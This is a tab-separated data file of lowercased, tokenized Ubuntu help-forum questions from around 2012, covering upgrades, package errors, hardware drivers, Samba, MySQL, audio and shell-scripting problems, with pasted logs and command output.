210682	samhain troubleshooting and performance	i am new user to samhain so do n't know much about it except the fact why its used . now i am finding my samhain-2.8.5 is consuming too much of cpu . its almost eating up 2 cores and i cant find the reason . i tried little bit googling but it does not seems to help me when it comes to troubleshoot this problem . in samhain logs all i could find is 3277bd028c279fc54b43e656bb3ea8e17a50136ff56b2085 mark : [ 2012-11-01t14:58:17-0400 ] msg= < -- -- timestamp -- -- > db1f18f7bf0118ea2a0a2e3ce0f227306aa2240f7d415d86 mark : [ 2012-11-01t14:59:17-0400 ] msg= < -- -- timestamp -- -- > cb231517356010b7491cb428d7a83fcee60a1fe4d829286a mark : [ 2012-11-01t15:00:17-0400 ] msg= < -- -- timestamp -- -- > c2911b37c38c028b707e7b0eca96b22495a19853a53d9d10 mark : [ 2012-11-01t15:01:17-0400 ] msg= < -- -- timestamp -- -- > 7c33c05acd870f9c866baf73f33a9af6a53937ada3093425 mark : [ 2012-11-01t15:02:17-0400 ] msg= < -- -- timestamp -- -- > 5e45f7af951ef082d4d1e0f4c8122543fbe247a9c231d75f mark : [ 2012-11-01t15:03:17-0400 ] msg= < -- -- timestamp -- -- > 9a534980763124616000f1b9206a15825019f31e5e5746e3 mark : [ 2012-11-01t15:04:17-0400 ] msg= < -- -- timestamp -- -- > e01dfce3d446ce7471480a0620a65371043e283e9ec2ef6c mark : [ 2012-11-01t15:05:17-0400 ] msg= < -- -- timestamp -- -- > 66b3bdce9b0003bbc852dfd26d65338e1b1aef657bece076 mark : [ 2012-11-01t15:06:17-0400 ] msg= < -- -- timestamp -- -- > 4b8b1419285efa450f38b6c11ff9de33bd9294f8b9df4ecc mark : [ 2012-11-01t15:07:17-0400 ] msg= < -- -- timestamp -- -- > 093d24204088e3132b53d0158f4213db9752282d21491f3b appreciate any input in this regard . the server is in production .
210684	uninstalling 12.10	what is the procedure to entirely remove ubuntu 12.10 ? i was running ubuntu 12.04 successfully and was advised that 12.10 was available as an upgrade . i updated 12.04 to 12.10 through the update manager . i have been unhappy with 12.10 from day 1 . i installed a fresh copy of 12.04 to run alongside 12.10 on a separate partition . i am a newbie at this and need to be able to clean the hard drive of all except the new 12.04 and its files . if this program is this buggy it should n't be offered as an update ! i just want to clean things up .
210687	how can i upgrade my 10.04. to new version	i recently upgrade my ubuntu from 9.04 to 10.04 and when i open update manager , it says : new ubuntu release '12.04.1 lts ' is available . ( should n't it be 10.10 or 11.xx ) ? when i click 'upgrade ' , it fails with could not calculate the upgrade how can i upgrade it to 12.04 ?
210688	how to integrate rhythmbox to play internet radio ?	i have been very fond of the sound menu integration that can be done via last.fm and the present radio stations . i wanted to know a way to listen to jazzradio or for that matter any radio on the internet i like . i tried installing the plug-in for rhythmbox but it did n't show in the plug-ins ( menu ) for internet radio in rhythmbox .
210692	can i use left alt to type dead keys and use the alt-tab application switcher ?	i’m on ubuntu 12.10 and i’ve seen that i can use sudo dpkg-reconfigure keyboard-configuration to control which key triggers the dead key behaviour on my keyboard ( which normally resides on altgr ) . i would like to use both alt as well as altgr to type dead keys . however , when i select “both alt keys“ in the “key to function as altgr” step , the alt-tab application switcher shortcut stops working , presumably because the key combo is swallowed by whatever controls text input . is there any way to make both work , since there is no dead key on tab ?
210694	are halo : combat evolved and minecraft compatible with ubuntu ? how to transfer files from windows to ubuntu ?	when installing ubuntu , i got the install alongside windows 7 option . is there a possible way of me being able to transfer a file from my windows 7 installation to ubuntu ? also , are halo : combat evolved and minecraft compatible with ubuntu ?
210697	apt badsig error ( ubuntu archive automatic signing key ) while updating	i 'm trying to update package 's repository but apt gives me this error : w : errore gpg : http : //it.archive.ubuntu.com precise release : le seguenti firme non erano valide : badsig xxxxxxxxxxxxxxxx ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > the ubuntu archive automatic signing key is not valid . can this problem make apt not to download important updates for my system ? i 'm using ubuntu 12.04 . thank you !
210701	issues after upgrading to ubuntu 12.10	i have attached an image of my laptop screen after i upgraded to ubuntu 12.10 from 12.04 . you will notice that all the desktop shows is 3 files . no taskbars or topbars are on the screen . when i start ubuntu i get an `` internal error occurred msg '' also . any help or advice on how to fix would be greatly appreciated .
210707	file 'unpublishes ' itself	how can i get the file in my ubuntu one folder to remain permanently published ? when i restart my computer i have to republish the file every time .
210709	xrdp client cant see task menu nor buttons ( remote connection )	i 'm just curious if anyone had the problem of not being able to see any menu 's or ubuntu related gui buttons in a rdp instance with remote desktop software . i was able to drag icons onto the desktop and view them - but other than that , nothing is viewable . im using a windows 7 remote desktop connecting to ubuntu . other than this issue everything else runs very smoothly .
210712	ubuntu 12.10 , likewise , and logging in to the domain	ok , so ive successfully joined my new ubuntu 12.10 install to my office 's domain but ... .but , i cant actually you know , log in ! on previous versions of ubuntu we had the ability to log in as `` other '' where we could log in using the upn , but that option doesnt look like it exists in 12.10 . so uh , how do i log in ?
210714	how to install waterfox browser on ubuntu 12.04 ?	i want to install the 64 bits version of firefox - waterfox on ubuntu 12.04 system . since the browser is not available in the software center and i was not able to find any examples of installing it i want to know has anyone do this ? please , provide more installation details since i am linux user for few weeks only .
210718	pros and cons for hard drive partition solutions	i just bought a new 1t hard drive to replace the dead one for my desktop . i use it mainly for number crunching , doing higher performance computations that consume lots of memory and cpu , and also read and write disk a lot . i will mainly work in ubuntu . so the obvious solution for hard drive partition is just let the whole disk to be a single ext4 partition . but i am also thinking about the pros and cons of other solutions with some size of ntfs partition for two reasons : ( 1 ) the disk may have errors because of future intensive disk read and writing , instead of using 1t monolithic partition , should i partition the disk into several smaller partitions , so that i can fix the disk errors within a smaller partition more quickly ? ( 2 ) i might want to install a windows system to use some software that do n't have good counter parts in ubuntu , say office , though i can install a virtual machine instead . what would you suggest to partition the hard drive given my purpose ? what are the pros and cons ? thanks , jeff
210721	ubuntu 12.10 and gnome-shell : ca n't see nor launch apps except with alt + f2	i 've installed ubuntu 12.10 and gnome-shell 3.6 . everything worked fine till the moment i 've began to customize the main menu ( apps wich appears in dash and so on ) . i do n't know wether i 've done something wrong or if there is a bug : suddenly , the dash became empty . my favourite docks too , except the `` show apps '' button . when i activate it , there is only an empty dash , no apps showed . the only way i can access an app is using the `` alt+f2 '' shortcut . i 've tried to restart gnome-shell ( alt-f2 / r ) but nothing has changed ... a logout and a reboot have not changed ... do you know how to repair the gnome-shell ? thanks for your help ...
210722	can not installs gnome in 12.10	when i try to install gnome de , i get dependency issues . the command apt-get install ubuntu-gnome-desktop ubuntu-gnome-default-settings gives the error message - ~ $ sudo apt-get install ubuntu-gnome-desktop ubuntu-gnome-default-settings reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-gnome-desktop : depends : gnome-shell but it is not going to be installed e : unable to correct problems , you have held broken packages . what do i do ? edit $ sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gnome-shell-common ( = 3.6.1-0ubuntu1 ) but 3.7.1+git20121024.a4e29e12-0ubuntu1~12.10~ricotz0 is to be installed e : unable to correct problems , you have held broken packages .
210728	python3.2 error ; unable to install or remove anything	i searched around as much as i could , but i could n't seem to find a solution to fix my problem . whether i install anything , remove anything , run sudo apt-get update or sudo apt-get upgrade , i still seem to get the following message : setting up python3.2 ( 3.2.3-0ubuntu3.2 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.2/py_compile.py '' , line 187 , in < module > sys.exit ( main ( ) ) file `` /usr/lib/python3.2/py_compile.py '' , line 179 , in main compile ( filename , doraise=true ) file `` /usr/lib/python3.2/py_compile.py '' , line 111 , in compile with tokenize.open ( file ) as f : file `` /usr/lib/python3.2/tokenize.py '' , line 344 , in open encoding , lines = detect_encoding ( buffer.readline ) file `` /usr/lib/python3.2/tokenize.py '' , line 332 , in detect_encoding encoding = find_cookie ( second ) file `` /usr/lib/python3.2/tokenize.py '' , line 304 , in find_cookie codec = lookup ( encoding ) file `` /usr/lib/python3.2/encodings/__init__.py '' , line 98 , in search_function level=0 ) eoferror : eof read where not expected dpkg : error processing python3.2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up libopenimageio1.0 ( 1.0.9+git20120918-0irie3~precise1 ) ... dpkg : dependency problems prevent configuration of libpython3.2 : libpython3.2 depends on python3.2 ( = 3.2.3-0ubuntu3.2 ) ; however : package python3.2 is not configured yet . dpkg : error processing libpython3.2 ( -- configure ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : python3.2 libpython3.2 it 's worth mentioning this problem occurred on my desktop right after i was updating and the city 's power 's just went off . when i booted back on after it returned , the system became immensely slow and updates seemed to show `` partial upgrade '' . i canceled it , ran sudo apt-get install -f and all the necessary commands to get it running , but it did n't seem to work after that . further notes : upon trying to install synaptic , i get this error : setting up python3.2 ( 3.2.3-0ubuntu3.2 ) ... traceback ( most recent call last ) : file `` /usr/lib/python3.2/py_compile.py '' , line 187 , in < module > sys.exit ( main ( ) ) file `` /usr/lib/python3.2/py_compile.py '' , line 179 , in main compile ( filename , doraise=true ) file `` /usr/lib/python3.2/py_compile.py '' , line 111 , in compile with tokenize.open ( file ) as f : file `` /usr/lib/python3.2/tokenize.py '' , line 344 , in open encoding , lines = detect_encoding ( buffer.readline ) file `` /usr/lib/python3.2/tokenize.py '' , line 332 , in detect_encoding encoding = find_cookie ( second ) file `` /usr/lib/python3.2/tokenize.py '' , line 304 , in find_cookie codec = lookup ( encoding ) file `` /usr/lib/python3.2/encodings/__init__.py '' , line 98 , in search_function level=0 ) eoferror : eof read where not expected dpkg : error processing python3.2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libpython3.2 : libpython3.2 depends on python3.2 ( = 3.2.3-0ubuntu3.2 ) ; however : package python3.2 is not configured yet . dpkg : error processing libpython3.2 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : python3.2 libpython3.2 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
210733	how to install master pdf editor in kubuntu 12.04 ( 64bit )	how to install master pdf editor under kubuntu ? i do not have it in the repositories . could somebody write it step by step ? thanks in advance !
210739	installing/setting themes information very confusing	i 'm finding very conflicting/confusing info about how to install and change desktop themes with unity . where to extract files , which program to use to change themes , etc . i 'm new to ubuntu and using 12.10 . all my web searches have proven this to be more difficult than anticipated . is there a web page with straight forward information and examples of how to do this ?
210741	why hard links are not allowed for directories ?	i am using ubuntu 12.04 and i am pretty new linux world . i am really amazed when i am trying to create hard link for any directory but it failed . i can create hard links for files inside filesystem boundry . i know reason why we can not create hardlinks for files beyond file system . i tried this command nischay @ nischaylaptop : ~ $ ln /some/direcoty /home/nischay/hard-directory hard link not allowed for directory nischay @ nischaylaptop : ~ $ sudo ln /some/direcoty /home/nischay/hard-directory [ sudo ] password for nischay : hard link not allowed for directory i just want to know the reason behind this . is it same for all gnu/linux distos and unix flavours ( bsd , solaris , hp-ux , ibm aix ) or only in ubuntu or linux .
210744	file manager ( nautilus ) hangs or is ultra slow when listing contents of ssh/sftp server	i used to use file -- > connect to server to connect to my remote ssh a lot before 12.04/11.10 . but now in a fresh install of 12.04 , whenever i try to access the remote files , nautilus either always hangs or is ultra slow ( > 5 mins ) in listing the directory contents . most of the time i have to force quit or xkill . mounting using sshfs works fine . the ssh server is fast and it works fine via putty , mc ( using fish ) and normal terminal . i even installed nautilus in lubuntu 12.04 ( virtualbox ) and to my surprise , browsing ssh server was fast and smooth . both versions of nautilus are at 3.4.2 thus i am led to believe the problem might be lying somewhere in ubuntu 12.04 . but i am clueless . all suggestions welcome . i really need to solve this problem .
210751	how can i enable publishing to facebook using online accounts in lubuntu shotwell 0.13 ?	since upgrade to lubuntu 12.10 , i ca n't publish photos to facebook , as the system is now integrated with `` online accounts '' , but these ca n't be configured . there 's no relevant entry in the configuration center .
210755	why is my caps lock not working as ctrl ?	i am on a lenovo w500 with german keyboard layout . i use ubuntu 12.10 and have configured my keyboard layout to use the caps lock as ctrl . but it does not work . i even tried to reboot my system . here is the configuration of my `` keyboard layout '' . my goal is to have caps lock and left ctrl as left ctrl plus the right ctrl as right ctrl .
210757	why do i get the corrupt jpeg data error when i run motion ?	i have ubuntu 10.04 64-bit and logitech hd c270 webcam . when i run motion ( as root or normal user ) , i get this output : [ 0 ] processing thread 0 - config file /etc/motion/motion.conf [ 0 ] motion 3.2.11 started [ 0 ] ffmpeg libavcodec_build 3412993 libavformat_build 3415808 [ 0 ] thread 1 is from /etc/motion/motion.conf [ 1 ] thread 1 started [ 1 ] cap.driver : `` uvcvideo '' [ 1 ] cap.card : `` uvc camera ( 046d:0825 ) '' [ 1 ] cap.bus_info : `` usb-0000:00:1d.7-4.1 '' [ 1 ] cap.capabilities=0x04000001 [ 1 ] - video_capture [ 1 ] - streaming [ 1 ] supported palettes : [ 1 ] 0 : yuyv ( yuv 4:2:2 ( yuyv ) ) [ 1 ] 1 : mjpg ( mjpeg ) [ 0 ] motion-httpd/3.2.11 running , accepting connections [ 0 ] motion-httpd : waiting for data on port tcp 8080 [ 1 ] index_format 2 test palette mjpg ( 320x240 ) [ 1 ] using palette mjpg ( 320x240 ) bytesperlines 0 sizeimage 51200 colorspace 00000008 [ 1 ] vidioc_g_jpegcomp not supported but it should be ( does your webcam driver support this ioctl ? ) [ 1 ] found control 0x00980900 , `` brightness '' , range 0,255 [ 1 ] `` brightness '' , default 128 , current 128 [ 1 ] found control 0x00980901 , `` contrast '' , range 0,255 [ 1 ] `` contrast '' , default 32 , current 32 [ 1 ] found control 0x00980902 , `` saturation '' , range 0,255 [ 1 ] `` saturation '' , default 32 , current 32 [ 1 ] found control 0x00980913 , `` gain '' , range 0,255 [ 1 ] `` gain '' , default 0 , current 0 [ 1 ] mmap information : [ 1 ] frames=4 [ 1 ] 0 length=51200 [ 1 ] 1 length=51200 [ 1 ] 2 length=51200 [ 1 ] 3 length=51200 [ 1 ] using v4l2 [ 1 ] resizing pre_capture buffer to 1 items followed by this error : corrupt jpeg data : 1 extraneous bytes before marker 0xd3 [ 1 ] mjpegtoyuv420p : corrupt image ... continue corrupt jpeg data : 1 extraneous bytes before marker 0xd4 [ 1 ] mjpegtoyuv420p : corrupt image ... continue corrupt jpeg data : 3 extraneous bytes before marker 0xd0 [ 1 ] mjpegtoyuv420p : corrupt image ... continue corrupt jpeg data : 4 extraneous bytes before marker 0xd2 [ 1 ] mjpegtoyuv420p : corrupt image ... continue the answer might lie in this line from the first part of the output : [ 1 ] vidioc_g_jpegcomp not supported but it should be ( does your webcam driver support this ioctl ? )
210772	how to uninstall ubuntu 12.04 lts dual booting with windows 7 ?	i need to uninstall ubuntu 12.04 lts from my laptop . it 's currently dual booting with windows 7 . i 've searched and found some ways to do this , but all use some kind of a cd to complete the deletion . i have neither the ubuntu live cd nor windows install cd/recovery cd . this laptop did not come with one , and i unfortunately have no available storage device to make a recovery cd . is there a way to completely uninstall ubuntu 12.04 lts dual booting without using any hardware ? if there 's no way , then how to uninstall using the least hardware possible ? or easy to find hardware ? i 've nothing against ubuntu . i installed this as a backup/alternative to error-prone windows 7 . however , after a hardware upgrade , including extra rams and a new , better cpu , windows 7 runs smoothly again . now i 'm running low on hard drive space and need the 40 gig or so of space i partitioned for ubuntu back . any help is appreciated , and thanks in advance !
210779	hd webcam not utilizing full resolution	i am using a logitech c270h on xubuntu 12.04 and it works with skype , pidgin , camorama , etc ... . the issue i have is that i can not get it to utilize full resolution , which is 1280x720 . v4l-info shows : anthony @ terminal : ~ $ v4l-info # # # v4l2 device info [ /dev/video0 ] # # # general info vidioc_querycap driver : `` uvcvideo '' card : `` uvc camera ( 046d:0825 ) '' bus_info : `` usb-0000:00:1d.2-2.2 '' version : 3.2.30 capabilities : 0x4000001 [ video_capture , streaming ] - snip - vidioc_g_fmt ( video_capture ) type : video_capture fmt.pix.width : 352 fmt.pix.height : 288 fmt.pix.pixelformat : 0x47504a4d [ mjpg ] fmt.pix.field : none fmt.pix.bytesperline : 0 fmt.pix.sizeimage : 12800 fmt.pix.colorspace : srgb fmt.pix.priv : 0 this is in line with the result i experience . no hd resolution . is there something wrong with my device , or is it a driver issue ? is there some additional configurations that can be made to get this thing working at full capacity ?
210787	how do i install tun/tap on ubuntu 10.04 ?	i 'm trying to run vpnc i get this error vpnc-connect : ca n't open /dev/net/tun , check that it is either device char 10 200 or ( with devfs ) a symlink to ../misc/net/tun ( not misc/net/tun ) : no such device vpnc-connect : ca n't initialise tunnel interface : no such device however when i check for the tun device i get root @ t ... ... ... ... : ~ # ls -l /dev/net/tun crw -- -- -- - 1 root root 10 , 200 2012-11-02 01:49 /dev/net/tun this is ubuntu 10.04 32bit running on a vps with tun/tap enabled . i had to ask the administrator to enable it .
210798	ubuntu 12.10 on a thinkpad x41 tablet pc	i am not a geek or anything like that . i just got a thinkpad x41 tablet pc with no os installed . i have been reading about ubuntu , and was wondering if it will work on the tablet and will all the functions be available . i know nothing about scripts and stuff like that . i downloaded ubuntu and burned it on a disk . that is as far as i have gone . need help ! thanks
210802	laptop taking far too long to start	ok the stats : software ubuntu : 12.10 gnome-shell : 3.6.1 laptop model : sony vaio sve15118fgb processor : intel® core™ i7-3612qm processor 2.10 ghz with turbo boost up to 3.10 ghz memory : 8gb ddr3 sdram graphics : amd radeon™ hd 7650m 2 gb ddr3 dedicated video memory ( probably the culprit ) . dmesg output ( full log ) there are two noticable jumps ( 4seconds+ ) so these are below : ... .. [ 1.882789 ] ext4-fs ( sda5 ) : info : recovery required on readonly filesystem [ 1.882792 ] ext4-fs ( sda5 ) : write access will be enabled during recovery [ 1.884416 ] usb 1-1.3 : > new high-speed usb device number 4 using ehci_hcd [ 1.982397 ] usb 1-1.3 : > new usb device found , idvendor=5986 , idproduct=02d3 [ 1.982403 ] usb 1-1.3 : > new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.982406 ] usb 1-1.3 : > product : usb2.0 camera [ 1.982409 ] usb 1-1.3 : > manufacturer : usb2.0 camera [ 2.648071 ] scsi 6:0:0:0 : > direct-access lge android platform 0100 pq : 0 ansi : 2 [ 2.648517 ] sd 6:0:0:0 : > attached scsi generic sg2 type 0 [ 2.649291 ] sd 6:0:0:0 : > [ sdb ] attached scsi removable disk [ 4.641826 ] ext4-fs ( sda5 ) : recovery complete [ 4.649516 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 30.383258 ] adding 16479228k swap on /dev/sda6 . priority : -1 extents:1 across:16479228k [ 30.410558 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 30.459398 ] udevd [ 427 ] : starting version 175 [ 30.493262 ] mei 0000:00:16.0 : > setting latency timer to 64 [ 30.493326 ] mei 0000:00:16.0 : > irq 44 for msi/msi-x ... .. [ 33.412578 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 34.232278 ] acer_wmi : acer laptop wmi extras unloaded [ 34.236305 ] wmi : mapper unloaded [ 38.443264 ] init : plymouth-stop pre-start process ( 3524 ) terminated with status 1 [ 57.933258 ] audit_printk_skb : 39 callbacks suppressed [ 57.933261 ] type=1701 audit ( 1351818581.889:25 ) : auid=4294967295 uid=1000 gid=1000 ses=4294967295 pid=4948 comm= '' chrome '' reason= '' seccomp '' sig=0 syscall=39 compat=0 ip=0x7f5aa73e9ed9 code=0x50000 so that 's the output , giving me a few questions , how do you read the log ? [ 38.443264 ] init : plymouth-stop pre-start process ( 3524 ) terminated with status 1 [ 57.933258 ] audit_printk_skb : 39 callbacks suppressed there is a gap of 19.489994 so is that gap while init : plymouth-stop is running , or while audit_printk_skb is running ? what can i do to further debug this ? what can i do to solve this ?
210806	bluetooth headset without crystal clear sound	i 've started using kubuntu 12.04 1 week ago , and i 'm having a little issue . i can connect my bluetooth headset without any problem , but the sound coming from the headset is n't crystal clear . i can have a really nice sound on windows 7 , but i ca n't find a way to make it happen on kubuntu . like i said , i 'm a early user . sorry for my english .
210808	set umask , set permissions , and set acl , but samba is n't using those ?	i 'm running on ubuntu server 12.04 . i have a folder called music and i want the default folder permissions to be 775 and the default file to then be 664 . i set the default permissions on the music folder to be 775 . i configured acl to use these default permissions as well : # file : music # owner : kris # group : kris # flags : ss- user : :rwx group : :rwx other : :r-x default : user : :rwx default : group : :rwx default : other : :r-x i also changed the default umask for my user account , kris , to 002 in .profile . should n't and new file/folder now use those permissions when writing to the samba share ? acl should work with samba from what i can gather . currently , if i write to that folder using my mac , folders are getting 755 and files 644 . i have another app on my mac called goodsync which which is able to sync a local directory on my mac to a network samba share , but those permissions are even worse . files are being written as 700 using that program . so it looks like samba is allowing the host/program to determine the folder/file permissions . what changes do i need to make to force the permissions i want regardless of what the host tries to write on the server ?
210810	banding with intel hd 4000	i just installed 12.10 on a mid-2012 13 '' macbook pro and i 've noticed that gradients on-screen exhibit slight banding problems . the system says it 's running 24-bit colour but it seems more like 16-bit . how should i go about troubleshooting this ? is it the kernel ? intel gfx drivers ? thanks
210814	ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )	my mysql installation was screwed up . i uninstalled and installed it multiple times . but i kept getting a hang or a error `` cant connect '' . i now finally have it running with sudo -u mysql mysqld . how do i get mysqld to run at startup , and why do i need to run it as user mysql . can i change it to run as root ? edit filesystem size used avail use % mounted on /dev/sda1 230g 5.5g 213g 3 % / none 2.0g 268k 2.0g 1 % /dev none 2.0g 3.2m 2.0g 1 % /dev/shm none 2.0g 92k 2.0g 1 % /var/run none 2.0g 0 2.0g 0 % /var/lock none 2.0g 0 2.0g 0 % /lib/init/rw /dev/sda5 230g 20g 199g 9 % /home
210815	how can i login to lightdm with password for fingerprint-enabled user after 12.10 upgrade ?	sorry for the long question . i have a laptop with ubuntu quantal 12.10 , a fingerprint scanner , and a few active user accounts . when the machine boots up to lightdm , i get a prompt toenter my password or scan my finger print . every now and then , fingerprint scanning just does n't seem to work . before the 12.10 upgrade , i was always able to enter my password for this user when fingerprint failed . now , no matter what , i have to scan my prints to login as this user . if i try to login as a different user ( fingerprint is not enabled for any others ) , i can see the password is typed out -- asterisks show in the password input box as i type them -- and get in . not so for the fingerprint user . any clues on how to figure out what 's gone wrong ?
210816	get working directory of terminal , not the script	i have a script that i want to create files , depending on the directory the user ( me ) is in ( it can be called from command line ) . however , it creates the file in the same directory the script is located . how can i change the script so it creates the file in the same directory as the terminal ? note : the command pwd when executed inside the script will print the working directory of the script , not the terminal .
210819	partition table bsd	i messed up the partition table of my hdd and i guess now its in the bsd format and windows/ubuntu both can not read it . does this mean i need to format my hdd and lose my entire file system or is there some way to get my files back ( not using recovery software which would be my last option if nothing works ) ? thanks
210821	wireless on inspiron 1501 not working on ubuntu 12.04 lts	as titled , i have ubuntu 12.04 lts on an inspiron 1501 , and the wireless has refused to work thus far . below is what i have tried : activating the broadcom driver via system settings > additional driver using the below commands sudo apt-get remove bcmwl-kernel-source sudo apt-get install firmware-b43-installer installing the cutter software sadly , none of them can get the wireless working . is there anything else i can try ?
210822	scribus has no spell check	there is no spell check in scribus 1.4.0 and 1.4.1 on ubuntu 12.04 . also tried installing aspell still no spell check . it does not appear at the end of the item menu . how do you get scribus to recognize the spelling libraries ? is it compiled wrong and so do i have to recompile it ?
210823	how do i set automatic login in ubuntu 12.10 ?	when i boot my computer , i already have to enter my password to decrypt my drive . so an additional password at the login screen ( light dm ) would not be necessary . how do i enable automatic logging in ? i tried the `` user accounts '' app , but it does n't show me the option like here ( is it a bug ? ) . that is even when i unlock the app . all the answers i found to my question only apply to versions older than 12.10 .
210825	is bumblebee supposed to be a `` seamless '' implementation ?	it is said that bumblebee is used to make nvidia optimus work on linux . the wikipedia optimus description says that the switching is designed to be completely seamless and to happen `` behind the scenes '' . however , after installing bumblebee , the recommended test seems to be to compare the operation of glxspheres with the operation of optirun glxspheres . the latter is faster than the former . if the switching is supposed to be seamless , why do we optirun to speed up graphics ? should n't it be automatic ?
210827	will upgrading windows 7 to 8 affect ubuntu installation ( dual-boot ) ?	i 'm posting this question because i have the intention to update my windows 7 ( damaged installation ) to windows 8 but i do n't know if this process may affect my ubuntu 12.04 install . i have 220 gb dedicated to windows , 65 gb to ubuntu , a 10 gb recovery and 1.5 gb swap partition . and one final doubt : is it recommended to update ubuntu to 12.10 ? if the answer is yes , how can i guarantee a safety update ?
210828	how to make partition in large volume for internal hdd ?	i have acer win7 laptop with 640gb hdd . i want to make large volume like 350gb for the other partition but i can make only 73gb > _ < i need to save my document before i reformat it . so how can i make 350gb for my partition ? thanks in advance = )
210836	asus 1201n fails to suspend	recently ( that is a week after installing ubuntu ) , my laptop does not suspend anymore . every time i try to suspend , it flashes a few times , locks my screen and then instantly resumes . the same happen when running pm-suspend . i 'm running ubuntu 12.10 64-bit with jupiter installed for managing the performance , if that 's of any help .
210839	no sound on resume after suspend in 12.10	the issue has begun within 12.10 . before it worked perfectly . now , even restarting alsa wo n't work , i have to reboot . please , ask for details . i 'm running ubuntu 12.10 , unity de with gnome 3.6 , no third parts drivers . thanks here you are with sudo lshw output : http : //pastebin.com/vh3sgcza i 've tried removing and readding the audio kernel module - however ca n't sudo modprobe -r snd_hda_intel . it gives fatal : module snd_hda_intel is in use here you are with /etc/modprobe.d/alsa-base.conf content : http : //pastebin.com/yvarb2ex my laptop model is hp 6730s in /var/log/syslog i found the following : kernel : [ 33.847111 ] pci_pm_runtime_suspend ( ) : azx_runtime_suspend+0x0/0x40 [ snd_hda_intel ] returns -11 cat /sys/module/snd_hda_intel/parameters/power_save gives 0 cat /sys/bus/pci/devices/0000\:00\:1b.0/power/control gives on pacmd list-sinks : welcome to pulseaudio ! use `` help '' for usage information . > > > 1 sink ( s ) available . * index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 100 % 1 : 100 % 0 : 0,00 db 1 : 0,00 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 0,00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le ch 2 48000 hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 1,00 .. 341,33 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 4 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` ad198x analog '' alsa.id = `` ad198x analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel '' alsa.long_card_name = `` hda intel at 0xd8900000 irq 49 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.name = `` 82801i ( ich9 family ) hd audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` stereo analogico '' device.description = `` audio interno stereo analogico '' alsa.mixer_name = `` analog devices ad1984a '' alsa.components = `` hda:11d4194a,103c3614,00100400 hda:11c11040,103c1378,00100200 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output : uscita analogica ( priority 9900 , available : unknown ) properties : active port : < analog-output >
210847	gsutil bashrc file path setting	actually i have just installed gsutil by following the instructions here . but now when i am typing gsutil at command prompt i am getting following : no command was given . choose one of -b , -d , -e , or -r to do something . try `/usr/bin/gsutil -- help ' for more information . what can be my mistake or am i supposed to do something else ? is it due to that i have not set correct path in my .bashrc file ? following path is set by me in .bashrc file : export path= $ { path } : $ usr/bin/gsutil and firstly i had set it to : export path= $ { path } : $ home/vishal/downloads/gsutil/gsutil
210849	fluxbox : blurry ttf fonts	i 'm using fluxbox . i 've noticed that the ttf fonts are quite blurry ( particularly in gvim ) : here 's an example , using inconsolata 12pt in fluxbox : here 's the same example , using inconsolata 12pt , except in unity : you can see that not only is the text easier to read in the unity case , it 's also larger . the font colors look faded in the fluxbox case as well . what i would like to ask is : how can i make the font under fluxbox look the same as under unity ? it looks as if fluxbox is n't getting the font sizes quite right and doing excessive antialiasing . why are the fonts being rendered at different sizes ? i thought 12pt should look the same in every environment ( on the same hardware ) . i 'm using an lcd , so my font settings under gnome-tweak-tool are : hinting : slight antialiasing : rgba here are my dpi settings ( same under fluxbox and unity ) : misha @ misha-lmd : ~ $ xdpyinfo | grep -b2 resolution screen # 0 : dimensions : 1280x1024 pixels ( 382x302 millimeters ) resolution : 85x86 dots per inch edit problem solved after editing .xresources . before : after :
210853	custom status byobu	# ! /bin/sh echo `` $ ( byobu ls|grep attached ) '' |sed 's/\ ( [ a-za-z0-9 ] [ a-za-z0-9 ] *\ ) . */\1/' this is my script in ~/.byobu/bin/ refresh time is 1 second . this shows the session name as the custom status , but it does so for all but 1 session.in place of showing the session name it shows ] 0 for that session . is it some issue with the echo command ?
